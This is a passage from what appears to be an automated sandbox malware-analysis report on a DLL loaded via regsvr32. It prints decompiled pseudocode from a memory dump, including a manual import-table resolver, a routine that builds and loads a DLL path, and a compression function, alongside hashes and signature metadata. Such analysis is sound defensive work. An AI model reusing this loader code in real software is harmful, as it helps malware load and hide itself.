                            0x1000ab1b
                            0x1000ab23
                            0x1000ab24
                            0x1000ab29
                            0x1000ab32
                            0x1000ab52
                            0x1000ab52
                            0x1000ab5a
                            0x1000ab5d
                            0x1000ab65
                            0x00000000
                            0x1000ab65
                            0x1000ab3b
                            0x1000ab3f
                            0x00000000
                            0x00000000
                            0x1000ab47
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 1000A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                            • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocFreememset
                            • String ID: D
                            • API String ID: 488076629-2746444292
                            • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                            • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}






















                            0x100124a1
                            0x100124a9
                            0x100124be
                            0x100124d0
                            0x100124dc
                            0x100124e2
                            0x100124e7
                            0x100124f3
                            0x1001265e
                            0x00000000
                            0x1001265e
                            0x100124f9
                            0x10012502
                            0x10012510
                            0x10012513
                            0x10012522
                            0x10012522
                            0x10012529
                            0x10012537
                            0x1001253a
                            0x10012557
                            0x1001255e
                            0x1001256e
                            0x10012586
                            0x10012570
                            0x10012578
                            0x10012578
                            0x10012589
                            0x1001258d
                            0x10012599
                            0x1001259d
                            0x100125a1
                            0x100125a5
                            0x100125b1
                            0x100125dc
                            0x100125e4
                            0x100125f6
                            0x10012602
                            0x100125b3
                            0x100125b8
                            0x100125c3
                            0x100125cf
                            0x100125cf
                            0x1001260b
                            0x10012611
                            0x1001261b
                            0x10012637
                            0x1001261d
                            0x1001262c
                            0x1001262c
                            0x1001261b
                            0x1001263f
                            0x10012648
                            0x10012648
                            0x10012656
                            0x00000000
                            0x10012656
                            0x10012562
                            0x00000000
                            0x10012562
                            0x00000000
                            0x1001253a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                            • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x1930590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x1930590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x1930590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x1930590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x1930590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x19afbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























                            0x1000c4ce
                            0x1000c4ce
                            0x1000c4ce
                            0x1000c4d1
                            0x1000c4dd
                            0x1000c4e8
                            0x1000c504
                            0x1000c509
                            0x1000c512
                            0x1000c514
                            0x1000c51c
                            0x1000c53d
                            0x1000c542
                            0x1000c54f
                            0x1000c55a
                            0x1000c561
                            0x1000c568
                            0x1000c579
                            0x1000c57f
                            0x1000c582
                            0x1000c599
                            0x1000c5a5
                            0x1000c5ad
                            0x1000c5b4
                            0x1000c5ba
                            0x1000c5c6
                            0x1000c5cc
                            0x1000c5d3
                            0x1000c5e6
                            0x1000c5d5
                            0x1000c5d5
                            0x1000c5d8
                            0x1000c5de
                            0x1000c5e3
                            0x1000c5e8
                            0x1000c5f3
                            0x1000c605
                            0x1000c617
                            0x00000000
                            0x1000c619
                            0x1000c620
                            0x00000000
                            0x1000c626
                            0x1000c627
                            0x1000c627
                            0x1000c62e
                            0x1000c630
                            0x1000c635
                            0x1000c635
                            0x1000c63a
                            0x1000c63e
                            0x1000c63e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                            • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                            Download Yara Rule
                            C-Code - Quality: 99%
                            			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                            0x10012d76
                            0x10012d7b
                            0x10012d7f
                            0x10012d82
                            0x10012d82
                            0x10012d85
                            0x10012d8a
                            0x10012d8f
                            0x10012d92
                            0x10012d97
                            0x10012d9a
                            0x10012da0
                            0x10012da0
                            0x10012dab
                            0x10012dae
                            0x10012db5
                            0x10012dba
                            0x00000000
                            0x00000000
                            0x10012dc0
                            0x10012dc5
                            0x10012dc5
                            0x10012dca
                            0x10012dd0
                            0x10012dda
                            0x10012ddf
                            0x10012de5
                            0x10012e04
                            0x10012e07
                            0x10012e12
                            0x10012e12
                            0x10012e12
                            0x10012e09
                            0x10012e09
                            0x10012e0b
                            0x00000000
                            0x10012e0d
                            0x10012e0d
                            0x10012e0d
                            0x10012e0b
                            0x10012e1a
                            0x10012e1f
                            0x10012e24
                            0x10012e2a
                            0x10012e2e
                            0x10012e31
                            0x10012e34
                            0x10012e3a
                            0x10012e3f
                            0x10012e42
                            0x10012e48
                            0x10012e4d
                            0x10012e53
                            0x10012e59
                            0x10012e5e
                            0x10012e61
                            0x10012e66
                            0x10012e6a
                            0x10012e6e
                            0x10012e71
                            0x10012e74
                            0x10012e7d
                            0x10012e84
                            0x10012e87
                            0x10012e8a
                            0x10012e8f
                            0x10012e94
                            0x10012e97
                            0x10012e9a
                            0x10012e9a
                            0x10012e9e
                            0x10012ea7
                            0x10012eae
                            0x10012eb1
                            0x10012eb6
                            0x10012ebb
                            0x10012ebb
                            0x10012ebe
                            0x10012ec3
                            0x00000000
                            0x00000000
                            0x10012de7
                            0x10012de9
                            0x10012df6
                            0x00000000
                            0x00000000
                            0x10012df6
                            0x10012de9
                            0x00000000
                            0x10012de5
                            0x10012ec9
                            0x10012ece
                            0x10012ed1
                            0x10012ed4
                            0x10012f7f
                            0x10012f7f
                            0x10012eda
                            0x10012eda
                            0x10012eda
                            0x10012edf
                            0x10012f09
                            0x10012f0c
                            0x10012f0c
                            0x10012f11
                            0x10012f13
                            0x10012f15
                            0x10012f18
                            0x10012f1b
                            0x10012f23
                            0x10012f28
                            0x10012f28
                            0x10012f2e
                            0x10012f31
                            0x10012f34
                            0x10012f37
                            0x10012f39
                            0x10012f39
                            0x10012f3a
                            0x10012f3a
                            0x10012f37
                            0x10012f48
                            0x10012f4b
                            0x10012f4f
                            0x10012f54
                            0x10012f57
                            0x10012f5a
                            0x10012f5a
                            0x10012f5a
                            0x10012f5d
                            0x10012f5d
                            0x10012f60
                            0x10012f60
                            0x10012ee1
                            0x10012ee1
                            0x10012ef1
                            0x10012ef4
                            0x10012ef9
                            0x10012ef9
                            0x10012efc
                            0x10012eff
                            0x10012f02
                            0x10012f04
                            0x10012f04
                            0x10012f63
                            0x10012f65
                            0x10012f68
                            0x10012f68
                            0x10012f6e
                            0x10012f72
                            0x10012f75
                            0x10012f77
                            0x10012f77
                            0x10012f88
                            0x10012f8a
                            0x10012f8a
                            0x10012f92
                            0x10012fa0
                            0x10012fa3
                            0x10012fa5
                            0x10012fc5
                            0x10012fc5
                            0x10012fc8
                            0x10012fce
                            0x10012fcf
                            0x10012fd2
                            0x10012fd4
                            0x10012fd7
                            0x10012fda
                            0x10012fdd
                            0x10012fe1
                            0x10012fe4
                            0x10012fe7
                            0x10012fea
                            0x10012fec
                            0x10012fec
                            0x10012fef
                            0x10012ff1
                            0x10012ff1
                            0x10012ff4
                            0x10012ff6
                            0x10012ff9
                            0x10013001
                            0x10013004
                            0x10013009
                            0x10013009
                            0x1001300f
                            0x10013012
                            0x10013015
                            0x10013017
                            0x10013017
                            0x10013018
                            0x10013018
                            0x10013023
                            0x10013023
                            0x10013023
                            0x10013026
                            0x10013029
                            0x10013029
                            0x1001302c
                            0x1001302c
                            0x10012fef
                            0x1001302f
                            0x10013032
                            0x10013035
                            0x10013037
                            0x1001303a
                            0x1001303c
                            0x1001303f
                            0x10013042
                            0x10013044
                            0x10013047
                            0x1001304f
                            0x10013057
                            0x1001305a
                            0x1001305a
                            0x1001305a
                            0x1001305d
                            0x1001305d
                            0x1001305d
                            0x10013060
                            0x10013066
                            0x10013068
                            0x10013068
                            0x1001306e
                            0x10013074
                            0x1001307d
                            0x10013084
                            0x10013086
                            0x10013089
                            0x10013089
                            0x1001308c
                            0x1001308c
                            0x1001308f
                            0x10013091
                            0x10013094
                            0x10013096
                            0x100130b1
                            0x100130b1
                            0x100130b5
                            0x100130b8
                            0x100130bb
                            0x100130be
                            0x100130d4
                            0x100130d4
                            0x100130d4
                            0x100130c0
                            0x100130c0
                            0x100130c2
                            0x100130c6
                            0x100130c9
                            0x00000000
                            0x100130cb
                            0x100130cb
                            0x100130cd
                            0x00000000
                            0x100130cf
                            0x100130cf
                            0x100130cf
                            0x100130cd
                            0x100130c9
                            0x100130d8
                            0x100130db
                            0x100130e0
                            0x100130ea
                            0x100130ea
                            0x100130ea
                            0x100130ed
                            0x10013098
                            0x10013098
                            0x1001309a
                            0x100130a1
                            0x100130a1
                            0x100130a3
                            0x100130a5
                            0x100130a7
                            0x100130ab
                            0x100130ad
                            0x100130af
                            0x00000000
                            0x00000000
                            0x100130af
                            0x100130ab
                            0x1001309c
                            0x1001309c
                            0x1001309f
                            0x00000000
                            0x00000000
                            0x1001309f
                            0x1001309a
                            0x100130f7
                            0x100130f9
                            0x100130f9
                            0x10013104
                            0x10012fa7
                            0x10012fa7
                            0x10012faa
                            0x00000000
                            0x10012fac
                            0x10012fac
                            0x10012fae
                            0x10012fb2
                            0x00000000
                            0x10012fb4
                            0x10012fb4
                            0x10012fb4
                            0x10012fb7
                            0x00000000
                            0x10012fbb
                            0x10012fc4
                            0x10012fc4
                            0x10012fb7
                            0x10012fb2
                            0x10012faa
                            0x10012f96
                            0x10012f9f
                            0x10012f9f

                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
